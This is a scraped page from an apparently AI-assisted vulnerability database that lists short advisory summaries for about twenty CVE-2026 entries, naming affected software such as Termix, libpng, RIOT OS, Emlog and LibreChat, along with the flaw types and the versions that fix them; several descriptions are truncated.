Live Vulnerability Intelligence
Threat Database
Search CVEs, inspect descriptions, and open detail pages with AI-assisted technical context.
Threat Entry
Updated 2026-01-16
CVE-2026-22804 - Termix Plugin
Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. From 1.7.0 to 1.9.0, Stored Cross-Site Scripting (XSS) vulnerability exists in the Termix File Manager component. The application fails to sanitize SVG file content before rendering it. This allows an attacker who has compromised a managed SSH server to plant a malicious file, which, when previewed by the Termix user, executes arbitrary JavaScript in the context of the application. The vulnerability is located in src/ui/desktop/apps/file-manager/components/FileViewer.tsx. This vulnerability is fixed in 1.10.0.
PLUGIN
Termix
CVE-2026-22804
Risk Score
Threat Entry
Updated 2026-01-13
CVE-2026-22805 - Metabase Plugin
Metabase is an open-source data analytics platform. Prior to 55.13, 56.3, and 57.1, self-hosted Metabase instances that allow users to create subscriptions could be potentially impacted if their Metabase is colocated with other unsecured resources. This vulnerability is fixed in 55.13, 56.3, and 57.1.
PLUGIN
Metabase
CVE-2026-22805
Risk Score
Threat Entry
Updated 2026-01-21
CVE-2026-22801 - Libpng Plugin
LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From 1.6.26 to 1.6.53, there is an integer truncation in the libpng simplified write API functions png_write_image_16bit and png_write_image_8bit causes heap buffer over-read when the caller provides a negative row stride (for bottom-up image layouts) or a stride exceeding 65535 bytes. The bug was introduced in libpng 1.6.26 (October 2016) by casts added to silence compiler warnings on 16-bit systems. This vulnerability is fixed in 1.6.54.
PLUGIN
Libpng
CVE-2026-22801
Risk Score
Threat Entry
Updated 2026-01-21
CVE-2026-22214 - RIOT OS Plugin
RIOT OS versions up to and including 2026.01-devel-317 contain a stack-based buffer overflow vulnerability in the ethos utility due to missing bounds checking when processing incoming serial frame data. The vulnerability occurs in the _handle_char() function, where incoming frame bytes are appended to a fixed-size stack buffer without verifying that the current write index remains within bounds. An attacker capable of sending crafted serial or TCP-framed input can cause the current write index to exceed the buffer size, resulting in a write past the end of the stack buffer. This…
PLUGIN
RIOT OS
CVE-2026-22214
Risk Score
Threat Entry
Updated 2026-01-21
CVE-2026-22695 - Libpng Plugin
LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From 1.6.51 to 1.6.53, there is a heap buffer over-read in the libpng simplified API function png_image_finish_read when processing interlaced 16-bit PNGs with 8-bit output format and non-minimal row stride. This is a regression introduced by the fix for CVE-2025-65018. This vulnerability is fixed in 1.6.54.
PLUGIN
Libpng
CVE-2026-22695
Risk Score
Threat Entry
Updated 2026-01-13
CVE-2026-22212 - TinyOS Plugin
TinyOS versions up to and including 2.1.2 contain a stack-based buffer overflow vulnerability in the mcp2200gpio utility. The vulnerability is caused by unsafe use of strcpy() and strcat() functions when constructing device paths during automatic device discovery. A local attacker can exploit this by creating specially crafted filenames under /dev/usb/, leading to stack memory corruption and application crashes.
PLUGIN
TinyOS
CVE-2026-22212
Risk Score
Threat Entry
Updated 2026-01-21
CVE-2026-22800 - PILOS Plugin
PILOS (Platform for Interactive Live-Online Seminars) is a frontend for BigBlueButton. Prior to 4.10.0, Cross-Site Request Forgery (CSRF) vulnerability exists in an administrative API endpoint responsible for terminating all active video conferences on a single server. The affected endpoint performs a destructive action but is exposed via an HTTP GET request. Although proper authorization checks are enforced and the endpoint cannot be triggered cross-site, the use of GET allows the action to be implicitly invoked through same-site content (e.g. embedded resources rendered within the application). As a result, an authenticated…
PLUGIN
PILOS
CVE-2026-22800
Risk Score
Threat Entry
Updated 2026-01-21
CVE-2026-22213 - RIOT OS Plugin
RIOT OS versions up to and including 2026.01-devel-317 contain a stack-based buffer overflow vulnerability in the tapslip6 utility. The vulnerability is caused by unsafe string concatenation in the devopen() function, which constructs a device path using unbounded user-controlled input. The utility uses strcpy() and strcat() to concatenate the fixed prefix '/dev/' with a user-supplied device name provided via the -s command-line option without bounds checking. This allows an attacker to supply an excessively long device name and overflow a fixed-size stack buffer, leading to process crashes and memory corruption.
PLUGIN
RIOT OS
CVE-2026-22213
Risk Score
Threat Entry
Updated 2026-01-21
CVE-2026-22794 - Appsmith Plugin
Appsmith is a platform to build admin panels, internal tools, and dashboards. Prior to 1.93, the server uses the Origin value from the request headers as the email link baseUrl without validation. If an attacker controls the Origin, password reset / email verification links in emails can be generated pointing to the attacker’s domain, causing authentication tokens to be exposed and potentially leading to account takeover. This vulnerability is fixed in 1.93.
PLUGIN
Appsmith
CVE-2026-22794
Risk Score
Threat Entry
Updated 2026-01-21
CVE-2026-22799 - Emlog Plugin
Emlog is an open source website building system. emlog v2.6.1 and earlier exposes a REST API endpoint (/index.php?rest-api=upload) for media file uploads. The endpoint fails to implement proper validation of file types, extensions, and content, allowing authenticated attackers (with a valid API key or admin session cookie) to upload arbitrary files (including malicious PHP scripts) to the server. An attacker can obtain the API key either by gaining administrator access to enable the REST API setting, or via information disclosure vulnerabilities in the application. Once uploaded, the malicious PHP file…
PLUGIN
Emlog
CVE-2026-22799
Risk Score
Threat Entry
Updated 2026-01-21
CVE-2026-22788 - WebErpMesv2 Plugin
WebErpMesv2 is a Resource Management and Manufacturing execution system Web for industry. Prior to 1.19, the WebErpMesV2 application exposes multiple sensitive API endpoints without authentication middleware. An unauthenticated remote attacker can read business-critical data including companies, quotes, orders, tasks, and whiteboards. Limited write access allows creation of company records and full manipulation of collaboration whiteboards. This vulnerability is fixed in 1.19.
PLUGIN
WebErpMesv2
CVE-2026-22788
Risk Score
Threat Entry
Updated 2026-01-13
CVE-2026-22786 - Gin Vue Admin Plugin
Gin-vue-admin is a backstage management system based on vue and gin. Gin-vue-admin
PLUGIN
Gin Vue Admin
CVE-2026-22786
Risk Score
Threat Entry
Updated 2026-01-13
CVE-2026-22798 - Hermes Plugin
hermes is an implementation of the HERMES workflow to automatize software publication with rich metadata. From 0.8.1 to before 0.9.1, hermes subcommands take arbitrary options under the -O argument. These have been logged in raw form. If users provide sensitive data such as API tokens (e.g., via hermes deposit -O invenio_rdm.auth_token SECRET), these are written to the log file in plain text, making them available to whoever can access the log file. This vulnerability is fixed in 0.9.1.
PLUGIN
Hermes
CVE-2026-22798
Risk Score
Threat Entry
Updated 2026-01-21
CVE-2026-22789 - WebErpMesv2 Plugin
WebErpMesv2 is a Resource Management and Manufacturing execution system Web for industry. Prior to 1.19, WebErpMesv2 contains a file upload validation bypass vulnerability in multiple controllers that allows authenticated users to upload arbitrary files, including PHP scripts, leading to Remote Code Execution (RCE). This vulnerability is identical in nature to CVE-2025-52130 but exists in different code locations that were not addressed by the original fix. This vulnerability is fixed in 1.19.
PLUGIN
WebErpMesv2
CVE-2026-22789
Risk Score
Threat Entry
Updated 2026-01-13
CVE-2026-22772 - Fulcio Plugin
Fulcio is a certificate authority for issuing code signing certificates for an OpenID Connect (OIDC) identity. Prior to 1.8.5, Fulcio's metaRegex() function uses unanchored regex, allowing attackers to bypass MetaIssuer URL validation and trigger SSRF to arbitrary internal services. Since the SSRF only can trigger GET requests, the request cannot mutate state. The response from the GET request is not returned to the caller so data exfiltration is not possible. A malicious actor could attempt to probe an internal network through Blind SSRF. This vulnerability is fixed in 1.8.5.
PLUGIN
Fulcio
CVE-2026-22772
Risk Score
Threat Entry
Updated 2026-02-26
CVE-2026-22785 - Orval Plugin
orval generates type-safe JS clients (TypeScript) from any valid OpenAPI v3 or Swagger v2 specification. Prior to 7.18.0, the MCP server generation logic relies on string manipulation that incorporates the summary field from the OpenAPI specification without proper validation or escaping. This allows an attacker to "break out" of the string literal and inject arbitrary code. This vulnerability is fixed in 7.18.0.
PLUGIN
Orval
CVE-2026-22785
Risk Score
Threat Entry
Updated 2026-01-16
CVE-2026-22784 - Lychee Plugin
Lychee is a free, open-source photo-management tool. Prior to 7.1.0, an authorization vulnerability exists in Lychee's album password unlock functionality that allows users to gain possibly unauthorized access to other users' password-protected albums. When a user unlocks a password-protected public album, the system automatically unlocks ALL other public albums that share the same password, resulting in a complete authorization bypass. This vulnerability is fixed in 7.1.0.
PLUGIN
Lychee
CVE-2026-22784
Risk Score
Threat Entry
Updated 2026-01-16
CVE-2026-22781 - TinyWeb Plugin
TinyWeb is a web server (HTTP, HTTPS) written in Delphi for Win32. TinyWeb HTTP Server before version 1.98 is vulnerable to OS command injection via CGI ISINDEX-style query parameters. The query parameters are passed as command-line arguments to the CGI executable via Windows CreateProcess(). An unauthenticated remote attacker can execute arbitrary commands on the server by injecting Windows shell metacharacters into HTTP requests. This vulnerability is fixed in 1.98.
PLUGIN
TinyWeb
CVE-2026-22781
Risk Score
Threat Entry
Updated 2026-01-16
CVE-2026-22783 - Iris Web Plugin
Iris is a web collaborative platform that helps incident responders share technical details during investigations. Prior to 2.4.24, the DFIR-IRIS datastore file management system has a vulnerability where mass assignment of the file_local_name field combined with path trust in the delete operation enables authenticated users to delete arbitrary filesystem paths. The vulnerability manifests through a three-step attack chain: authenticated users upload a file to the datastore, update the file's file_local_name field to point to an arbitrary filesystem path through mass assignment, then trigger the delete operation which removes the target…
PLUGIN
Iris Web
CVE-2026-22783
Risk Score
Threat Entry
Updated 2026-01-15
CVE-2026-22252 - LibreChat Plugin
LibreChat is a ChatGPT clone with additional features. Prior to v0.8.2-rc2, LibreChat's MCP stdio transport accepts arbitrary commands without validation, allowing any authenticated user to execute shell commands as root inside the container through a single API request. This vulnerability is fixed in v0.8.2-rc2.
PLUGIN
LibreChat
CVE-2026-22252
Risk Score